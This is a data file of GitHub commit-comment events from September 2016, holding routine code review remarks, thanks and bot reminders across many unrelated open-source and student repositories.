{"id":"4514272535","type":"CommitCommentEvent","actor":{"login":"ahmdrz"},"repo":{"name":"ahmdrz/Instagram-API-python"},"payload":{"comment":{"id":18894090,"position":null,"line":null,"path":null,"commit_id":"166ead4e30471e1cac968c5d5592374b2dcf8f53","created_at":"2016-09-04T19:39:56Z","updated_at":"2016-09-04T19:39:56Z","body":"@sp41mer \r\nAre you sure ? \r\nIt's worked for me.\r\nI try it again but it still worked.\r\nWhen i changed next_max_id to zero , method return empty list of users."}},"created_at":"2016-09-04T19:39:56Z"}
{"id":"4514272724","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18894091,"position":49,"line":155,"path":"sedona-index.html","commit_id":"874093ed5da78aa98e0947d09f3b3c831a1dcc30","created_at":"2016-09-04T19:40:05Z","updated_at":"2016-09-04T19:40:05Z","body":"У тебя сейчас сохранение данных формы в localstorage не работает, потому что здесь идет 4 раза присвоение к одной переменной. Замени на date_number_1, date_number_2 и date_number_3."}},"created_at":"2016-09-04T19:40:05Z"}
{"id":"4514273031","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18894092,"position":8,"line":352,"path":"language/src/ceylon/language/annotations.ceylon","commit_id":"a0770de71de0ff9ce0b4f7b4e0bb09d692e4117e","created_at":"2016-09-04T19:40:16Z","updated_at":"2016-09-04T19:40:16Z","body":"Is this line correct? I'm not 100% about the syntax of doc references (I took a quick look online but I couldn't find any documentation about the format), but I thought `[[foo|bar]]` meant show \"foo\" but link to \"bar\"? In that case I find it strange that one is `findServices` and the other `findServiceProviders`."}},"created_at":"2016-09-04T19:40:16Z"}
{"id":"4514273370","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18894093,"position":5,"line":0,"path":"app/src/main/java/com/ruesga/rview/misc/AndroidHelper.java","commit_id":"c1041313b3992246b835e247412b742057ed9fa3","created_at":"2016-09-04T19:40:33Z","updated_at":"2016-09-04T19:40:33Z","body":"You want to revert this ;)"}},"created_at":"2016-09-04T19:40:33Z"}
{"id":"4514275278","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894094,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T19:41:56Z","updated_at":"2016-09-04T19:41:56Z","body":"We need AND, else it will be set when it is NULL. Most likely it is NULL."}},"created_at":"2016-09-04T19:41:56Z"}
{"id":"4514275673","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18894095,"position":53,"line":159,"path":"sedona-index.html","commit_id":"874093ed5da78aa98e0947d09f3b3c831a1dcc30","created_at":"2016-09-04T19:42:15Z","updated_at":"2016-09-04T19:42:15Z","body":"Здесь с переменой stotage аналогично – она 4 раза перезаписывается и остается только последнее значение. Сделай 4 разных."}},"created_at":"2016-09-04T19:42:15Z"}
{"id":"4514277019","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18894097,"position":5,"line":82,"path":"compiler-java/src/com/redhat/ceylon/compiler/java/tools/CeyloncTool.java","commit_id":"db807b2a703da06cbbf9b71943aff1d44a893724","created_at":"2016-09-04T19:43:09Z","updated_at":"2016-09-04T19:43:09Z","body":"Did you want to leave this commented out this way or was it committed by accident?"}},"created_at":"2016-09-04T19:43:09Z"}
{"id":"4514278218","type":"CommitCommentEvent","actor":{"login":"Jaroom"},"repo":{"name":"Jaroom/Timetableapp"},"payload":{"comment":{"id":18894099,"position":null,"line":null,"path":null,"commit_id":"85181adeaf88750d9c5ecc3fe8ada102b327afdf","created_at":"2016-09-04T19:44:04Z","updated_at":"2016-09-04T19:44:04Z","body":"Just added License\r\n"}},"created_at":"2016-09-04T19:44:04Z"}
{"id":"4514278748","type":"CommitCommentEvent","actor":{"login":"Boymexii"},"repo":{"name":"Boymexii/Wanmillion"},"payload":{"comment":{"id":18894103,"position":null,"line":null,"path":null,"commit_id":"a4fb08d0bd97575c3a49f058b6506e61d3105d90","created_at":"2016-09-04T19:44:25Z","updated_at":"2016-09-04T19:44:25Z","body":"\r\n[Wanmilion-master.zip](https://github.com/Boymexii/Wanmillion/files/454078/Wanmilion-master.zip)\r\n"}},"created_at":"2016-09-04T19:44:25Z"}
{"id":"4514280553","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18894106,"position":71,"line":170,"path":"sedona-index.html","commit_id":"874093ed5da78aa98e0947d09f3b3c831a1dcc30","created_at":"2016-09-04T19:45:34Z","updated_at":"2016-09-04T19:45:34Z","body":"Присвоение в форму тоже некорректно сейчас. Каждому инпуту должно присваиваться свое значение."}},"created_at":"2016-09-04T19:45:34Z"}
{"id":"4514280558","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":18894107,"position":122,"line":64,"path":"Lesson_4/main.rb","commit_id":"cbff97dac70a14e719a2197dd90e6a95c7552924","created_at":"2016-09-04T19:45:35Z","updated_at":"2016-09-04T19:45:35Z","body":"Отлично! Единственный момент, константы принято объявлять в самом начале класса, чтобы было ясно какие константы существуют и чтобы проще было изменять их исходные значения в случае чего."}},"created_at":"2016-09-04T19:45:35Z"}
{"id":"4514280611","type":"CommitCommentEvent","actor":{"login":"saiichihashimoto"},"repo":{"name":"jshemas/openGraphScraper"},"payload":{"comment":{"id":18894108,"position":null,"line":null,"path":null,"commit_id":"218385276f1efb68529e25778e503cc3b9b6925f","created_at":"2016-09-04T19:45:37Z","updated_at":"2016-09-04T19:45:37Z","body":"Wann deploy this? :-)"}},"created_at":"2016-09-04T19:45:37Z"}
{"id":"4514280984","type":"CommitCommentEvent","actor":{"login":"scotthartbti"},"repo":{"name":"DirtyUnicorns/android_frameworks_base"},"payload":{"comment":{"id":18894109,"position":null,"line":null,"path":null,"commit_id":"0d202a8ed705df8d9d0f366e24ff4ff40c4bc8d5","created_at":"2016-09-04T19:45:54Z","updated_at":"2016-09-04T19:45:54Z","body":"Just curious, did you guys use this change for M as well?  I am a bit hesitant on this one as Arter said that it may cause some odd behaviour on certain devices.  Guess I was wondering if you’ve seen any odd behaviour with this change?"}},"created_at":"2016-09-04T19:45:54Z"}
{"id":"4514281365","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18894110,"position":8,"line":5,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/tree/ErrorCode.java","commit_id":"75db39f5996d73d721924ce30d1b72a99e205f67","created_at":"2016-09-04T19:46:12Z","updated_at":"2016-09-04T19:46:12Z","body":"There **is** a smiley there in case you hadn't noticed."}},"created_at":"2016-09-04T19:46:12Z"}
{"id":"4514284193","type":"CommitCommentEvent","actor":{"login":"nilsonfm"},"repo":{"name":"nilsonfm/dweb"},"payload":{"comment":{"id":18894112,"position":null,"line":null,"path":null,"commit_id":"5ae846307faae4a946841eb4aa1172cbf7b002bf","created_at":"2016-09-04T19:48:09Z","updated_at":"2016-09-04T19:48:09Z","body":"Ver 1"}},"created_at":"2016-09-04T19:48:09Z"}
{"id":"4514284275","type":"CommitCommentEvent","actor":{"login":"nychitman1"},"repo":{"name":"DirtyUnicorns/android_frameworks_base"},"payload":{"comment":{"id":18894113,"position":null,"line":null,"path":null,"commit_id":"0d202a8ed705df8d9d0f366e24ff4ff40c4bc8d5","created_at":"2016-09-04T19:48:12Z","updated_at":"2016-09-04T19:48:12Z","body":"@scotthartbti Yeah, we used this in M. Did not notice any odd behavior on any of our devices then or now."}},"created_at":"2016-09-04T19:48:12Z"}
{"id":"4514284420","type":"CommitCommentEvent","actor":{"login":"nilsonfm"},"repo":{"name":"nilsonfm/dweb"},"payload":{"comment":{"id":18894114,"position":null,"line":null,"path":null,"commit_id":"5ae846307faae4a946841eb4aa1172cbf7b002bf","created_at":"2016-09-04T19:48:17Z","updated_at":"2016-09-04T19:48:17Z","body":"ver2"}},"created_at":"2016-09-04T19:48:17Z"}
{"id":"4514284796","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":18894115,"position":197,"line":112,"path":"Lesson_4/main.rb","commit_id":"cbff97dac70a14e719a2197dd90e6a95c7552924","created_at":"2016-09-04T19:48:29Z","updated_at":"2016-09-04T19:48:29Z","body":"Здесь тоже можно использовать ту же технику с константой `TRAIN_TYPES`."}},"created_at":"2016-09-04T19:48:29Z"}
{"id":"4514285895","type":"CommitCommentEvent","actor":{"login":"nilsonfm"},"repo":{"name":"nilsonfm/prueba"},"payload":{"comment":{"id":18894116,"position":null,"line":null,"path":null,"commit_id":"32b903b9105a64d5f30b5254ac8d7a80a7706082","created_at":"2016-09-04T19:49:09Z","updated_at":"2016-09-04T19:49:09Z","body":"ver3"}},"created_at":"2016-09-04T19:49:09Z"}
{"id":"4514286163","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":18894117,"position":254,"line":141,"path":"Lesson_4/main.rb","commit_id":"cbff97dac70a14e719a2197dd90e6a95c7552924","created_at":"2016-09-04T19:49:16Z","updated_at":"2016-09-04T19:49:16Z","body":"👍 "}},"created_at":"2016-09-04T19:49:16Z"}
{"id":"4514286216","type":"CommitCommentEvent","actor":{"login":"Dogmans897"},"repo":{"name":"Dogmans897/MetroICS460"},"payload":{"comment":{"id":18894118,"position":5,"line":6,"path":"src/TestProjectDriver.java","commit_id":"692d1d070d439114e51448344c612e7849b22a9a","created_at":"2016-09-04T19:49:17Z","updated_at":"2016-09-04T19:49:17Z","body":"Nice catch"}},"created_at":"2016-09-04T19:49:17Z"}
{"id":"4514288812","type":"CommitCommentEvent","actor":{"login":"scotthartbti"},"repo":{"name":"DirtyUnicorns/android_frameworks_base"},"payload":{"comment":{"id":18894119,"position":null,"line":null,"path":null,"commit_id":"0d202a8ed705df8d9d0f366e24ff4ff40c4bc8d5","created_at":"2016-09-04T19:50:52Z","updated_at":"2016-09-04T19:50:52Z","body":"Cool, thanks for the feedback.\n\nOn Sep 4, 2016 3:48 PM, \"Josh Chasky\" <notifications@github.com> wrote:\n\n> @scotthartbti <https://github.com/scotthartbti> Yeah, we used this in M.\n> Did not notice any odd behavior on any of our devices then or now.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DirtyUnicorns/android_frameworks_base/commit/0d202a8ed705df8d9d0f366e24ff4ff40c4bc8d5#commitcomment-18894113>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB8m3IXs2XIvuoqgKQ3-9KHraOTS4ldpks5qmyB8gaJpZM4J0nJp>\n> .\n>\n"}},"created_at":"2016-09-04T19:50:52Z"}
{"id":"4514289691","type":"CommitCommentEvent","actor":{"login":"coatless"},"repo":{"name":"SMAC-Group/TTS"},"payload":{"comment":{"id":18894120,"position":null,"line":null,"path":null,"commit_id":"1d19c1681236ad14f67a7e4c26ac3b6a4e88336f","created_at":"2016-09-04T19:51:24Z","updated_at":"2016-09-04T19:51:24Z","body":"Link to issue with `#issue number` e.g. #3 \r\n\r\nNeed `90-appendix.Rmd` in top level as well."}},"created_at":"2016-09-04T19:51:24Z"}
{"id":"4514291707","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894121,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T19:52:44Z","updated_at":"2016-09-04T19:52:44Z","body":"It is definitely empty on my system.\r\nIs there a syntax error maybe?\r\nI've just tried this, but doesn't work either. =gtk will still be exported.\r\n```\r\nif (NULL == g_getenv (\"QT_STYLE_OVERRIDE\") && strcmp(g_getenv (\"QT_QPA_PLATFORMTHEME\"), \"qt5ct\") != 0) {\r\n            csm_util_setenv (\"QT_STYLE_OVERRIDE\", \"gtk\");\r\n        }\r\n```"}},"created_at":"2016-09-04T19:52:44Z"}
{"id":"4514294443","type":"CommitCommentEvent","actor":{"login":"kajzersoze"},"repo":{"name":"haecker-felix/gradio"},"payload":{"comment":{"id":18894122,"position":null,"line":null,"path":null,"commit_id":"304761ca07a1df027ece18c3e51d79d06f4141ec","created_at":"2016-09-04T19:54:47Z","updated_at":"2016-09-04T19:54:47Z","body":"Yeah I don't think it's doable to convert from pixbuf to gicon.\r\nBest way I come up with is to download the image, scale it with pixbuf, save the file in the config dir and then load it as gicon. Works great, if you're interested in doing it that way let me know and I'll make a commit."}},"created_at":"2016-09-04T19:54:47Z"}
{"id":"4514297624","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18894125,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-04T19:57:03Z","updated_at":"2016-09-04T19:57:03Z","body":"I don't understand why you added the UUID->JavaObject logic?\r\n\r\nIf you're trying to prevent bad conversions from UUID there are a bunch of others that also don't make sense?"}},"created_at":"2016-09-04T19:57:03Z"}
{"id":"4514298062","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18894126,"position":null,"line":null,"path":null,"commit_id":"27d84bf6610666c23e7026d1b30f558a20144010","created_at":"2016-09-04T19:57:26Z","updated_at":"2016-09-04T19:57:26Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;yCyiWJz0&#x2F;13-add-typescript-preprocessor\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add typescript preprocessor</a>"}},"created_at":"2016-09-04T19:57:26Z"}
{"id":"4513048788","type":"CommitCommentEvent","actor":{"login":"gauthamnair"},"repo":{"name":"priscole/GIS_Scripts"},"payload":{"comment":{"id":18891829,"position":66,"line":66,"path":"metaDataFormat.py","commit_id":"a9c1b33879d4975aba65210287ec161b57027d2a","created_at":"2016-09-04T02:03:04Z","updated_at":"2016-09-04T02:03:04Z","body":"if you have to do this particular if/else again somewhere else, better to use polymorphism to represent the two types of workspaces and the valid operations on them.\r\n```python\r\nclass GeoDBWorkspace\r\n    ...\r\n    def listFiles(self):\r\n        return arcpy.ListFeatureClasses(feature_type = 'point')\r\n\r\nclass ShapeFileWorkspace\r\n    ....\r\n    def listFiles(self):\r\n        return arcpy.ListFiles() \r\n```\r\nand then pass an instance of the workspace to other functions."}},"created_at":"2016-09-04T02:03:04Z"}
{"id":"4513048951","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18891830,"position":1,"line":1,"path":"app/src/main/java/com/kamron/pogoiv/Overlay/Fragments/CompleteIvListFragment.java","commit_id":"0f7addc545f26492b79aeb39f8cbce051708e452","created_at":"2016-09-04T02:03:16Z","updated_at":"2016-09-04T02:03:16Z","body":"Protip: Java package names are by convention always lowercase."}},"created_at":"2016-09-04T02:03:16Z"}
{"id":"4513049590","type":"CommitCommentEvent","actor":{"login":"gauthamnair"},"repo":{"name":"priscole/GIS_Scripts"},"payload":{"comment":{"id":18891831,"position":84,"line":84,"path":"metaDataFormat.py","commit_id":"a9c1b33879d4975aba65210287ec161b57027d2a","created_at":"2016-09-04T02:04:01Z","updated_at":"2016-09-04T02:04:01Z","body":"this is just else"}},"created_at":"2016-09-04T02:04:01Z"}
{"id":"4513050856","type":"CommitCommentEvent","actor":{"login":"mikefaille"},"repo":{"name":"ApplETS/ETSMobile-Android2"},"payload":{"comment":{"id":18891832,"position":null,"line":null,"path":null,"commit_id":"a51b89bfa0495583a21e0146270fc6e3f3bf4d5a","created_at":"2016-09-04T02:05:17Z","updated_at":"2016-09-04T02:05:17Z","body":"Tu peux voir dans les issues. ;-)"}},"created_at":"2016-09-04T02:05:17Z"}
{"id":"4513051444","type":"CommitCommentEvent","actor":{"login":"smoker1977"},"repo":{"name":"smoker1977/git-tutorial"},"payload":{"comment":{"id":18891834,"position":4,"line":7,"path":"README.md","commit_id":"a91d1e6098b8d61d1d93b059292d94645f4cc3e0","created_at":"2016-09-04T02:05:55Z","updated_at":"2016-09-04T02:05:55Z","body":"OK"}},"created_at":"2016-09-04T02:05:55Z"}
{"id":"4513054136","type":"CommitCommentEvent","actor":{"login":"gnut3ll4"},"repo":{"name":"ApplETS/ETSMobile-Android2"},"payload":{"comment":{"id":18891836,"position":null,"line":null,"path":null,"commit_id":"a51b89bfa0495583a21e0146270fc6e3f3bf4d5a","created_at":"2016-09-04T02:09:03Z","updated_at":"2016-09-04T02:09:03Z","body":"Merci @mikefaille !"}},"created_at":"2016-09-04T02:09:03Z"}
{"id":"4513058686","type":"CommitCommentEvent","actor":{"login":"aquynh"},"repo":{"name":"aquynh/capstone"},"payload":{"comment":{"id":18891841,"position":null,"line":null,"path":null,"commit_id":"5311ef224a96c66e498d01423ac76a8625e0242d","created_at":"2016-09-04T02:14:13Z","updated_at":"2016-09-04T02:14:13Z","body":"fixed that with the latest commit, thanks!"}},"created_at":"2016-09-04T02:14:13Z"}
{"id":"4513058936","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18891843,"position":40,"line":87,"path":"app/src/main/java/com/kamron/pogoiv/MainActivity.java","commit_id":"c24ee4e0d6ff98cdf5c12fc9fc6e6d6960717275","created_at":"2016-09-04T02:14:32Z","updated_at":"2016-09-04T02:14:32Z","body":"👍 \r\nDropping flags like `pokeFlyRunning ` and similar is very good, if we can! (And I think Android's lifecycle management should let us do that). Instead of remembering incorrectly whether a service is running, we can just ask Android."}},"created_at":"2016-09-04T02:14:32Z"}
{"id":"4513060643","type":"CommitCommentEvent","actor":{"login":"lmmx"},"repo":{"name":"lmmx/shots"},"payload":{"comment":{"id":18891844,"position":null,"line":null,"path":null,"commit_id":"bda3f25bc99ae406115e9f29999a719314ee3715","created_at":"2016-09-04T02:16:35Z","updated_at":"2016-09-04T02:16:35Z","body":"Image Credit & Licence: Craig Lindsay\r\nvia https://twitter.com/AntonioParis/status/772134630883467264"}},"created_at":"2016-09-04T02:16:35Z"}
{"id":"4513061536","type":"CommitCommentEvent","actor":{"login":"paulelliott"},"repo":{"name":"paulelliott/authem"},"payload":{"comment":{"id":18891845,"position":null,"line":null,"path":null,"commit_id":"86113a0efcc503d34ff38692a2f17497710def55","created_at":"2016-09-04T02:17:43Z","updated_at":"2016-09-04T02:17:43Z","body":"Because it didn't work on travis at the time.\r\n\r\nhttps://travis-ci.org/paulelliott/authem/jobs/114953237"}},"created_at":"2016-09-04T02:17:43Z"}
{"id":"4513061794","type":"CommitCommentEvent","actor":{"login":"ben5516"},"repo":{"name":"houston/houston-core"},"payload":{"comment":{"id":18891846,"position":11,"line":54,"path":"app/views/layouts/dashboard.html.erb","commit_id":"74852deeedf32335066a4ca0e169c923816a4028","created_at":"2016-09-04T02:18:04Z","updated_at":"2016-09-04T02:18:04Z","body":"😮 "}},"created_at":"2016-09-04T02:18:04Z"}
{"id":"4513061906","type":"CommitCommentEvent","actor":{"login":"ben5516"},"repo":{"name":"houston/houston-core"},"payload":{"comment":{"id":18891847,"position":11,"line":54,"path":"app/views/layouts/dashboard.html.erb","commit_id":"74852deeedf32335066a4ca0e169c923816a4028","created_at":"2016-09-04T02:18:11Z","updated_at":"2016-09-04T02:18:11Z","body":"Nice trick!\r\n"}},"created_at":"2016-09-04T02:18:11Z"}
{"id":"4513062259","type":"CommitCommentEvent","actor":{"login":"syscomputacion"},"repo":{"name":"syscomputacion/aprenderQt"},"payload":{"comment":{"id":18891848,"position":null,"line":null,"path":null,"commit_id":"7880fcad686f0082f903a259ec68775c0cd02361","created_at":"2016-09-04T02:18:37Z","updated_at":"2016-09-04T02:18:37Z","body":"Se agrego la segunda linea porque no habia otra cosa para hacer"}},"created_at":"2016-09-04T02:18:37Z"}
{"id":"4513063501","type":"CommitCommentEvent","actor":{"login":"kmurtha"},"repo":{"name":"kmurtha/MurthaKristinahw1"},"payload":{"comment":{"id":18891849,"position":null,"line":null,"path":null,"commit_id":"53e3f4dafd04aa6c91cd803531645f1bb177c9c7","created_at":"2016-09-04T02:20:03Z","updated_at":"2016-09-04T02:20:03Z","body":"Created hello world java program.\r\n"}},"created_at":"2016-09-04T02:20:03Z"}
{"id":"4513065279","type":"CommitCommentEvent","actor":{"login":"random-person-001"},"repo":{"name":"random-person-001/MagicText"},"payload":{"comment":{"id":18891851,"position":null,"line":null,"path":null,"commit_id":"c4618112fc7ffc259c4142b54222b8cad559fa86","created_at":"2016-09-04T02:22:09Z","updated_at":"2016-09-04T02:22:09Z","body":"It was cuz of this.\r\n![image](https://cloud.githubusercontent.com/assets/14933641/18228633/6f56b644-721c-11e6-9839-f3a596836316.png)\r\n\r\nHeh.  "}},"created_at":"2016-09-04T02:22:09Z"}
{"id":"4513066504","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891853,"position":null,"line":null,"path":null,"commit_id":"4c9ffc46c44355f0d15f9fc533baa1fc9142de46","created_at":"2016-09-04T02:23:32Z","updated_at":"2016-09-04T02:23:32Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:23:32Z"}
{"id":"4513066510","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891854,"position":null,"line":null,"path":null,"commit_id":"6b98ebeb08b3dc32bd76bd22904455a737333ac6","created_at":"2016-09-04T02:23:33Z","updated_at":"2016-09-04T02:23:33Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:23:33Z"}
{"id":"4513066520","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891855,"position":null,"line":null,"path":null,"commit_id":"30118c06730f60ff3562c7e39d67d6553a002162","created_at":"2016-09-04T02:23:33Z","updated_at":"2016-09-04T02:23:33Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:23:33Z"}
{"id":"4513066530","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891856,"position":null,"line":null,"path":null,"commit_id":"0cdc83f1036a01d71deb2aeb6434aa4f8f8159b8","created_at":"2016-09-04T02:23:34Z","updated_at":"2016-09-04T02:23:34Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:23:34Z"}
{"id":"4513067675","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18891857,"position":null,"line":null,"path":null,"commit_id":"3607efd5c692faa783e85cc56aa69b3a209da7d9","created_at":"2016-09-04T02:24:55Z","updated_at":"2016-09-04T02:24:55Z","body":"from what I test, I against this :P\r\nGlt.X with job lv 25\r\n`[25 * 25 * (110/100) * 50] * 200%` => `31250 * 2 = 62500`\r\nRanger with job lv 37\r\n`[37 * 37 * (110/100) * 50] * 200%` => `68450 * 2 = 136900`\r\n\r\n`*200%` because there's double EXP this week.\r\n\r\n\r\n![morajobexp](https://cloud.githubusercontent.com/assets/4016864/18228637/40e470f2-7281-11e6-95c6-d3355027b3ef.png)"}},"created_at":"2016-09-04T02:24:55Z"}
{"id":"4513067947","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"srober12/dockpanelsuite"},"payload":{"comment":{"id":18891858,"position":null,"line":null,"path":null,"commit_id":"946d7e5b96b73ba8af7b9a7488f3330ac2910bd4","created_at":"2016-09-04T02:25:15Z","updated_at":"2016-09-04T02:25:15Z","body":"Thanks for making such a great theme. But I'd like to remind that,\r\n- By reusing VS2012 Light theme elements (DockPaneStrip and DockPaneCaption) this is more of a VS2012 Dark theme, which is now part of DPS 2.11 release (in master branch).\r\n- The new VS2012 Dark theme does not only bring the dark color palette, but also gives better rendering effect to match VS2012, such as autohide strip and tool window caption. "}},"created_at":"2016-09-04T02:25:15Z"}
{"id":"4513071466","type":"CommitCommentEvent","actor":{"login":"ismailcaakir"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":18891861,"position":null,"line":null,"path":null,"commit_id":"679766a1aed5c1cd5a45d1d667326122a29e8600","created_at":"2016-09-04T02:28:47Z","updated_at":"2016-09-04T02:28:47Z","body":"Thanks :)"}},"created_at":"2016-09-04T02:28:47Z"}
{"id":"4513073337","type":"CommitCommentEvent","actor":{"login":"qiuyesuifeng"},"repo":{"name":"siddontang/go-mysql"},"payload":{"comment":{"id":18891862,"position":null,"line":null,"path":null,"commit_id":"c5f95f6907d1771ffdafd75108b2b1978d6e2003","created_at":"2016-09-04T02:30:14Z","updated_at":"2016-09-04T02:30:14Z","body":"LGTM"}},"created_at":"2016-09-04T02:30:14Z"}
{"id":"4513073890","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18891863,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-04T02:30:40Z","updated_at":"2016-09-04T02:30:40Z","body":"Why don't you add this to Nemisys instead of the thing that no one uses?"}},"created_at":"2016-09-04T02:30:40Z"}
{"id":"4513078628","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891864,"position":null,"line":null,"path":null,"commit_id":"4c9ffc46c44355f0d15f9fc533baa1fc9142de46","created_at":"2016-09-04T02:34:23Z","updated_at":"2016-09-04T02:34:23Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:34:23Z"}
